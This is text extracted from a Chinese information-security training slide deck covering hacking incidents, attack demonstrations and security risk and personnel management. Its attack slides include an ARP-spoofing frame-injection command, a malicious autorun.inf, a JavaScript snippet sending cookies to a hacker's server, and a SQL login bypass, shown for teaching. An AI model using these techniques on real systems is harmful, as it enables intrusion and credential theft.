信息安全风险及分析_第1页
信息安全风险及分析_第2页
信息安全风险及分析_第3页
信息安全风险及分析_第4页
信息安全风险及分析_第5页
已阅读5页,还剩83页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、信息安全风险及分析第1页,共88页,2022年,5月20日,16点35分,星期一个人介绍 高显嵩工作经历:中国“互联网信息安全与政府监管”专家组成员中国法证技术研究组成员北京司法局电子数据鉴定协会理事北京广播电视大学特聘专家原微软公司的技术支持工程师项目背景劳动部全国民办中介机构信用等级评定系统劳动部全国知识竞赛评分系统劳动部七个功能平台合并方案北京统计局的报表打印系统北京电大一站式平台合并的规划及实施为考研在线提供整体安全解决方安及实施为国家电力部内部网络设计安全解决方安及实施鞍山移动公司网络规划长期负责北京市安全局国家安全部内部技术培训负责华彬大厦的整个网络规划及实施美国百麦公司北京分公司

2、的整个网络规划及实施第2页,共88页,2022年,5月20日,16点35分,星期一主要内容信息安全的重要性信息安全问题分析信息安全管理概述信息安全风险管理信息安全人员管理第3页,共88页,2022年,5月20日,16点35分,星期一信息安全重要性第4页,共88页,2022年,5月20日,16点35分,星期一当前我国网络信息安全的状况网络及计算机病毒传播泛滥垃圾邮件和病毒邮件泛滥 黑客攻击事件频繁用户的个人隐私及计算机的使用权受到侵犯网络犯罪事件频繁监管力度不够涉及版权问题的事件增多没有统一完善的适合国情的安全标准及法规没有职责分明的管理部门或管理小组制约与网络基础设施和技术环境安全体系不健全全

3、民安全意识及计算机网络知识薄弱第5页,共88页,2022年,5月20日,16点35分,星期一CERT有关信息安全的统计 第6页,共88页,2022年,5月20日,16点35分,星期一 CERT有关信息安全的统计 第7页,共88页,2022年,5月20日,16点35分,星期一CERT有关信息安全的统计 第8页,共88页,2022年,5月20日,16点35分,星期一网络病毒传播泛滥据2001年调查,我国约73%的计算机用户曾感染病毒,2003年上半年升至83%。其中,感染3次以上的用户高达59%,而且病毒的破坏性较大,被病毒破坏全部数据的占14%,破坏部分数据的占57%。对病毒的预防和发现速度相对

4、缓慢 垃圾邮件及病毒邮件泛滥第9页,共88页,2022年,5月20日,16点35分,星期一黑客离我们很近1996年信息安全数据显示,世界上平均每秒就有一起黑客事件发生,无论是政府机构、军事部门,还是各大银行、大公司,只要与互联网接轨,就难逃黑客的“黑手”。据美国网络安全公司Sophos发布的报告显示,在2008年第一季度,平均每5秒钟就会有一个网页成为黑客们的“盘中餐”。中国网民每年被网络黑客“黑”掉76亿元。第10页,共88页,2022年,5月20日,16点35分,星期一FBI计算机犯罪调查报告2002年503家机构中,有60%受到了攻击2002年其中223家(占503家的44%)损失的总和

5、达到$4.55848亿2003年530家机构中有75%(398家)在年内受到了攻击2003年251家(占530家的47%)的经济损失总和为$2.01799734 亿第11页,共88页,2022年,5月20日,16点35分,星期一全球信息安全损失数额: 年份损失额199936亿美元200042亿美元2001129亿美元 2002超过200亿美元2003超过280亿美元第12页,共88页,2022年,5月20日,16点35分,星期一中国已成为全球黑客的第三大来源地 有关统计数据显示,目前我国95%的与因特网相联的网络管理中心都遭到过国境内外黑客的攻击或侵入,受害涉及的覆盖面越来越大、程度越来越深。

6、据国际互联网保安公司Symantec年的报告指出,中国甚至已经成为全球黑客的第三大来源地,竟然有6.9%的攻击国际互联网活动都是由中国发出的。然而面对这种局面,我国却缺乏像西方发达国家那样健全的防范措施。第13页,共88页,2022年,5月20日,16点35分,星期一第14页,共88页,2022年,5月20日,16点35分,星期一第15页,共88页,2022年,5月20日,16点35分,星期一第16页,共88页,2022年,5月20日,16点35分,星期一2003年黑客事件中韩新人王网上对抗 遭黑客入侵推迟10多分钟中韩围棋新人王对抗赛在中国的新浪网和韩国网站落子,孔杰七段执白中盘战胜韩国的宋

7、泰坤四段。赛前,由于有人以孔杰的名字入侵比赛的服务器,导致比赛推迟了多分钟才正常进行。 第17页,共88页,2022年,5月20日,16点35分,星期一2003年黑客事件百度连续遭遇严重黑客攻击 5月15日至5月18日,中文搜索网站百度遭到中国互联网有史以来罕见黑客攻击。据百度负责技术的副总裁刘建国介绍,自5月15日22:00起,百度的检索量突然大增,此番增长并未引起工程师注意。5月16日,攻击更加强烈,每秒钟攻击次数搞到达1000次,同一个词被查询次数最多达38863次。据互联网技术专家介绍,每秒钟攻击100次就已经属于非常严重的攻击,而每秒钟1000次的攻击就实属罕见第18页,共88页,2

8、022年,5月20日,16点35分,星期一2003年黑客事件263游戏论坛遭黑客攻击关闭第19页,共88页,2022年,5月20日,16点35分,星期一2004年黑客事件腾讯服务器被攻击10月17日早上10时许,国内各地网民陆续腾讯QQ无法登陆。据腾讯QQ内部技术人员透露,一国内团体,利用腾讯QQ服务器漏洞要挟腾讯支付100万美金作为“修复”费用,腾讯QQ不予理睬后,该组织于17日正式发动攻击,腾讯QQ服务器在1个小时内大面积出现故障,不得不全面终止进行抢修.本次行动组织严谨、操作迅速,业内有部分安全管理人士称网络进入软件绑架勒索时代。第20页,共88页,2022年,5月20日,16点35分,

9、星期一2004年黑客事件江民网站被攻击2004年10月17日国内著名的杀毒软件厂商江民公司的网站被一名为河马史诗的黑客攻破,页面内容被篡改。攻击缘由:江民公司的最新杀毒软件产品KV2005的升级导致用户在上网时无法打开“邮件监控和网页监控”,用户在江民公司的官方论坛发反映后,江民没有做出及时的回复,也没能在短时间内解决用户的问题。第21页,共88页,2022年,5月20日,16点35分,星期一2005年黑客事件频繁 也许你的计算机正在被当作从事违法犯罪活动的工具,而当这些悄悄发生的时候,你却一无所知,因为你的电脑已经成为被别人控制的“僵尸电脑”。第22页,共88页,2022年,5月20日,16

10、点35分,星期一2005年黑客事件国内首起僵尸网络事件 今年27岁的徐立系唐山市某企业工人,其利用某些手段在互联网上传播其编写的特定程序,先后植入4万余台计算机,形成了中国首例BOTNET“僵尸网络。 2004年10月至2005年1月,徐立操纵“僵尸网络”对北京大吕黄钟电子商务有限公司所属音乐网站北京飞行网(简称酷乐),发动多次攻击,致使该公司蒙受重大经济损失,并导致北京电信数据中心某机房网络设备大面积瘫痪。第23页,共88页,2022年,5月20日,16点35分,星期一2006年黑客事件2006年12月31日 中国工商银行被黑06年的最后一天,很多网友都收到一些号称“工行要倒闭,所有存款均没

11、收”之类的新闻链接,地址都是正牌的,而不是盗版的。原来工商被黑客入侵,截止当天晚上11点,发现此漏洞已经修改好。 第24页,共88页,2022年,5月20日,16点35分,星期一07年第一黑客事件深圳律师网被黑当进入该网站之后,就发生事故了,发现,已经被黑.主要有以下字样:天空未留痕迹,鸟儿却已飞过.网络亦是虚拟,疯狂亦是叛逆.尊敬的網站管理員 您好.台湾是中国的,日本是吃S的. .如果你是中国人.请保留此页几天 谢谢!. 少年浪子 所向披靡 OICQ 11888956第25页,共88页,2022年,5月20日,16点35分,星期一例子:得到本地登录密码Pulist.exe+findpass.

12、exePasswordReminder.exe第26页,共88页,2022年,5月20日,16点35分,星期一例子:记录本地登录密码GINA PassWord Sniffer第27页,共88页,2022年,5月20日,16点35分,星期一例子得到远程计算机的密码IpcScan2.0第28页,共88页,2022年,5月20日,16点35分,星期一例子:更改本地管理员密码WindowsNT/2000/XP/2003/Linux/Unix系统,本地接触可以更改任意用户的密码。一张软盘更改本地管理员密码Ntpassword一张光盘更改本地管理员密码ERD Commander 2003第29页,共88页

13、,2022年,5月20日,16点35分,星期一例子:ERD COMMANDER第30页,共88页,2022年,5月20日,16点35分,星期一例子: ERD COMMANDER第31页,共88页,2022年,5月20日,16点35分,星期一例子:得到他人的邮件密码密码监听器2.8第32页,共88页,2022年,5月20日,16点35分,星期一第33页,共88页,2022年,5月20日,16点35分,星期一第34页,共88页,2022年,5月20日,16点35分,星期一第35页,共88页,2022年,5月20日,16点35分,星期一例子:内网渗透 ZXARPS.EXE内网主机访问任意站点被入侵指

14、定的IP段中的用户访问的所有网站都插入一个框架代码 zxarps.exe -idx 0 -ip -9 -port 80 -insert 第36页,共88页,2022年,5月20日,16点35分,星期一ARP协议工作原理第37页,共88页,2022年,5月20日,16点35分,星期一ARP欺骗交换机第38页,共88页,2022年,5月20日,16点35分,星期一ARP欺骗计算机第39页,共88页,2022年,5月20日,16点35分,星期一例子:内网U盘感染U盘在互联网和局域网内交叉使用文件被盗取Autorun.infautorun风暴autorunopen=shellopen=打开(&O)sh

15、ellopenCommand=WScript.exe .autorun.vbsshellopenDefault=1shellexplore=资源管理器(&X)shellexploreCommand=WScript.exe .autorun.vbs第40页,共88页,2022年,5月20日,16点35分,星期一例子:查看网络内任何人的上网记录可以记录同一局域网内任何计算机上浏览的网页内容,察看的邮箱内容,登陆的ftp的内容。用Outlook或者Outlook Express接受的全部邮件都回同时被该软件接收。第41页,共88页,2022年,5月20日,16点35分,星期一第42页,共88页,20

16、22年,5月20日,16点35分,星期一例子:查看MSN密码第43页,共88页,2022年,5月20日,16点35分,星期一例子:察看星号密码第44页,共88页,2022年,5月20日,16点35分,星期一例子:读取缓存密码第45页,共88页,2022年,5月20日,16点35分,星期一例子:控制他人计算机Dameware 4.5Remote Administrator2.1是一种网络管理软件,但是经常被黑客利用来远程控制和管理,被入侵者的计算机。第46页,共88页,2022年,5月20日,16点35分,星期一第47页,共88页,2022年,5月20日,16点35分,星期一第48页,共88页,

17、2022年,5月20日,16点35分,星期一例子:打开对方摄像头和语音第49页,共88页,2022年,5月20日,16点35分,星期一SQL INJECTION 针对网站的攻击第50页,共88页,2022年,5月20日,16点35分,星期一SQL INJECTION 针对网站的攻击第51页,共88页,2022年,5月20日,16点35分,星期一SQL INJECTION 针对网站的攻击第52页,共88页,2022年,5月20日,16点35分,星期一SQL INJECTION 针对网站的攻击第53页,共88页,2022年,5月20日,16点35分,星期一SQL INJECTION 针对网站的攻击

18、第54页,共88页,2022年,5月20日,16点35分,星期一SQL INJECTION 针对网站的攻击第55页,共88页,2022年,5月20日,16点35分,星期一SQL INJECTION 针对网站的攻击第56页,共88页,2022年,5月20日,16点35分,星期一SQL INJECTION 针对网站的攻击第57页,共88页,2022年,5月20日,16点35分,星期一SQL INJECTION 针对网站的攻击第58页,共88页,2022年,5月20日,16点35分,星期一XSS 跨站脚本构建了个 Javascript 脚本传递客户端的 cookie 到黑客的服务器Javascrip

19、t 脚本可以简单的这样写 var img = new Image(); img.src = get_cookie.php?var= + encodeURI(document.cookie); 然后服务器端使用 PHP 简单写了个脚本保存 Cookie 数据 第59页,共88页,2022年,5月20日,16点35分,星期一构造SQL登陆语句用户名: admin密码: 1 or 1=1第60页,共88页,2022年,5月20日,16点35分,星期一其他例子击键记录Office文档挂栽木马网页木马木马捆绑第61页,共88页,2022年,5月20日,16点35分,星期一信息安全管理概述第62页,共88

20、页,2022年,5月20日,16点35分,星期一 例一:局域网内病毒泛滥成灾。 例二:网络中为什么会有ARP欺骗的问题发生 例三:局域网内计算机故障频繁发生 例四:为什么要给每个用户管理员权限先来分析两个例子第63页,共88页,2022年,5月20日,16点35分,星期一 信息安全的成败取决于两个因素:技术和管理。 技术是信息安全的构筑材料,管理是真正的粘合剂和催化剂。 人们常说,三分技术,七分管理,可见管理对信息安全的重要性。 信息安全管理(Information Security Management)作为组织完整的管理体系中一个重要的环节,它构成了信息安全具有能动性的部分,是指导和控制组

21、织的关于信息安全风险的相互协调的活动,其针对对象就是组织的信息资产。 现实世界里大多数安全事件的发生和安全隐患的存在,与其说是技术上的原因,不如说是管理不善造成的,理解并重视管理对于信息安全的关键作用,对于真正实现信息安全目标来说尤其重要。 什么是信息安全管理?第64页,共88页,2022年,5月20日,16点35分,星期一 根据风险评估结果、法律法规要求、组织业务运作自身需要来确定控制目标与控制措施。 实施所选的安全控制措施。 针对检查结果采取应对措施,改进安全状况。 依据策略、程序、标准和法律法规,对安全措施的实施情况进行符合性检查。信息安全管理模型第65页,共88页,2022年,5月20

22、日,16点35分,星期一 信息安全必须从整体考虑,必须做到“有计划有目标、发现问题、分析问题、采取措施解决问题、后续监督避免再现”这样全程管理的思路,这就要求建立的是一套完整的信息安全管理体系,这样的系统工程,只有处于组织最高管理者领导和支持之下,才可能成功 最高管理层通过明确信息安全目标和方针为信息安全活动指引方向 最高管理层能够为信息安全活动提供必要的资源支持 最高管理层能够在重大问题上做出决策 最高管理层可以协调组织不同单位不同环节的关系,提升促动力 说到底,最高管理者是组织信息安全的最终责任人组织高管全面负责信息安全管理第66页,共88页,2022年,5月20日,16点35分,星期一

23、制定有效的安全管理计划,可以确保信息安全策略得到恰当执行 进行有效安全管理的途径,应该是自上而下的(Top-Down): 最高管理层负责启动并定义组织的安全方针 管理中层负责将安全策略充实成标准、基线、指南和程序,并监督执行 业务经理或安全专家负责实施安全管理文件中的指定配置 最终用户负责遵守组织所有的安全策略 安全管理计划小组应该开发三类计划: 战略计划(strategic plan)是长期计划(例如5年),相对稳定,定义了组织的目标和使命 战术计划(tactical plan)是中期计划(例如1年),是对实现战略计划中既定目标的任务和进度的细节描述,例如雇用计划、预算计划、维护计划、系统开

24、发计划等 操作计划(operational plan)是短期的高度细化的计划,须经常更新(每月或每季度),例如培训计划、系统部署计划、产品设计计划等按计划行事第67页,共88页,2022年,5月20日,16点35分,星期一 数据收集者(Data Collector)对数据主体(Data Subject):准确(Accuracy)、隐私(Privacy); 数据保管者(Data Custodian)对数据拥有者(Data Owner):可用性(Availability)、完整性(Integrity)、保密性(Confidentiality); 数据用户(Data Users)对拥有者/主体(Ow

25、ner/Subject):保密性(Confidentiality)和完整性; 系统用户(System Users)对系统拥有者(System Owner):可用性(Availability)和软件完整性(Software Integrity); 系统管理者(System Manager)对用户(Users),可用性(Integrity)、完整性(Integrity); 用户(Users)对其它用户(Other Users):可用性(Availability)。重要角色和职责第68页,共88页,2022年,5月20日,16点35分,星期一信息安全管风险管理第69页,共88页,2022年,5月20

26、日,16点35分,星期一风险 风险管理(Risk Management)就是识别风险、评估风险、采取措施将风险减少到可接受水平,并维持这个风险水平的过程。风险管理是信息安全管理的核心内容。 在信息安全领域,风险(Risk)就是指信息资产遭受损坏并给企业带来负面影响的潜在可能性。风险管理风险管理概述第70页,共88页,2022年,5月20日,16点35分,星期一 资产(Asset) 对组织具有价值的信息资产,包括计算机硬件、通信设施、数据库、文档信息、软件、信息服务和人员等,所有这些资产都需要妥善保护。 威胁(Threat) 可能对资产或组织造成损害的某种安全事件发生的潜在原因,需要识别出威胁源

27、(Threat source)或威胁代理(Threat agent)。 弱点(Vulnerability) 也被称作漏洞或脆弱性,即资产或资产组中存在的可被威胁利用的缺点,弱点一旦被利用,就可能对资产造成损害。 风险(Risk) 特定威胁利用资产弱点给资产或资产组带来损害的潜在可能性。 可能性(Likelihood) 对威胁发生几率(Probability)或频率(Frequency)的定性描述。 影响(Impact) 后果(Consequence),意外事件发生给组织带来的直接或间接的损失或伤害。 安全措施(Safeguard) 控制(control)或对策(countermeasure),

28、即通过防范威胁、减少弱点、限制意外事件带来影响等途径来消减风险的机制、方法和措施。 残留风险(Residual Risk) 在实施安全措施之后仍然存在的风险。风险管理相关要素第71页,共88页,2022年,5月20日,16点35分,星期一风险RISKRISKRISKRISK风险基本的风险采取措施后剩余的风险资产威胁弱点资产威胁弱点风险管理的目标第72页,共88页,2022年,5月20日,16点35分,星期一安全控制的成本安全事件造成的损失最小化的总成本低高高安全成本/损失所提供的安全水平关键是达成成本利益的平衡第73页,共88页,2022年,5月20日,16点35分,星期一识别并评价资产识别并

29、评估威胁识别并评估弱点现有控制确认风险评价接受保持现有控制确定风险消减策略选择控制目标和控制方式实施选定的控制YesNo确认并评估残留风险定期评估风险评估风险消减风险接受及控制风险管理风险管理的一般过程第74页,共88页,2022年,5月20日,16点35分,星期一 风险评估(Risk Assessment)是对信息资产及其价值、面临的威胁、存在的弱点,以及三者综合作用而带来风险的大小或水平的评估。 作为风险管理的基础,风险评估是组织确定信息安全需求的一个重要途径,属于组织信息安全管理体系策划的过程。主要任务包括: 识别构成风险的各种因素 评估风险发生的可能性和造成的影响,并最终评价风险水平或

30、大小 确定组织承受风险的能力 确定风险消减和控制的策略、目标和优先顺序 推荐风险消减对策以供实施 包括风险分析(Risk Analysis)和风险评价(Risk Evaluation)两部分,但一般来说,风险评估和风险分析同义。什么是风险评估?第75页,共88页,2022年,5月20日,16点35分,星期一 降低风险(Reduce Risk) 实施有效控制,将风险降低到可接受的程度,实际上就是力图减小威胁发生的可能性和带来的影响,包括: 减少威胁:例如,实施恶意软件控制程序,减少信息系统受恶意软件攻击的机会 减少弱点:例如,通过安全意识培训,强化职员的安全意识与安全操作能力 降低影响:例如,制

31、定灾难恢复计划和业务连续性计划,做好备份 规避风险(Avoid Risk) 或者Rejecting Risk。有时候,组织可以选择放弃某些可能引来风险的业务或资产,以此规避风险。例如,将重要的计算机系统与互联网隔离,使其免遭来自外部网络的攻击。 转嫁风险(Transfer Risk) 也称作Risk Assignment。将风险全部或者部分地转移到其他责任方,例如购买商业保险。 接受风险(Accept Risk) 在实施了其他风险应对措施之后,对于残留的风险,组织可以选择接受。确定风险消减策略第76页,共88页,2022年,5月20日,16点35分,星期一 绝对安全(即零风险)是不可能的。 实

32、施安全控制后会有残留风险或残存风险(Residual Risk)。 为了实现信息安全,应该确保残留风险在可接受的范围内: 残留风险Rr 原有风险R0 控制效力R 残留风险Rr 可接受的风险Rt 对残留风险进行确认和评价的过程其实就是风险接受的过程。决策者可以根据风险评估的结果来确定一个阀值,以该阀值作为是否接受残留风险的标准。 评价残留风险第77页,共88页,2022年,5月20日,16点35分,星期一信息安全人员管理第78页,共88页,2022年,5月20日,16点35分,星期一 人是信息安全的关键因素,人员管理不善会给组织带来非常大的安全威胁和风险。 有调查显示,大多数重大信息安全事件通常

33、都来自组织内部,例如,员工受利益驱使将公司技术图纸出卖给竞争对手,利用内部系统从事经济犯罪活动,或者由于缺乏安全意识或操作技能而导致误操作,引起信息系统故障等。 为降低内部员工所带来的人为差错、盗窃、欺诈及滥用设施的风险,并且避免引发法律风险,组织应该采取措施,加强内部人员的安全管理: 对工作申请者实施背景检查 签署雇用合同和保密协议 加强在职人员的安全管理 严格控制人员离职程序必须高度重视人员安全问题第79页,共88页,2022年,5月20日,16点35分,星期一 背景检查是工作申请过程的一个部分,组织至少会审查申请人简历中的基本信息。对于敏感职位,可能还会考虑进一步的调查。调查过程中,组织

34、可以请求访问申请人的信用和犯罪记录,甚至可以聘请外部公司对申请人进行调查,以确定是否存在潜在问题或利益冲突。 通过背景检查,可以防止: 因为人员解雇而导致法律诉讼 因为雇用疏忽而导致第三方的法律诉讼 雇用不合格的人员 丧失商业秘密 员工从一般岗位转入信息安全重要岗位,组织也应当对其进行检查,对于处在有相当权力位置的人员,这种检查应定期进行。背景检查(BACKGROUND CHECK)第80页,共88页,2022年,5月20日,16点35分,星期一 组织应与所有员工签订保密协议,作为雇用合同基本条款的一部分 保密协议应明确规定雇员对组织信息安全的责任、保密要求及违约的法律责任 签订保密承诺旨在加强员工对组织信息安全应承担的责任,协议上应有员工的签名并由其保存一份协议副本 对于处于试用期的新员工,要求其签订一份保密承诺 在允许第三方用户使用信息处理设施之前,要求其签订保密协议 当雇用期或合同期有更改,特别是雇员到期离职或合同终止时,应重申保密协议保密协议( CONFIDENTIALITY AGREEMENT )第81页,共88页,2022年,5月20日,16点35分,星期一 职务分离(Separation of Duties),将一个

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论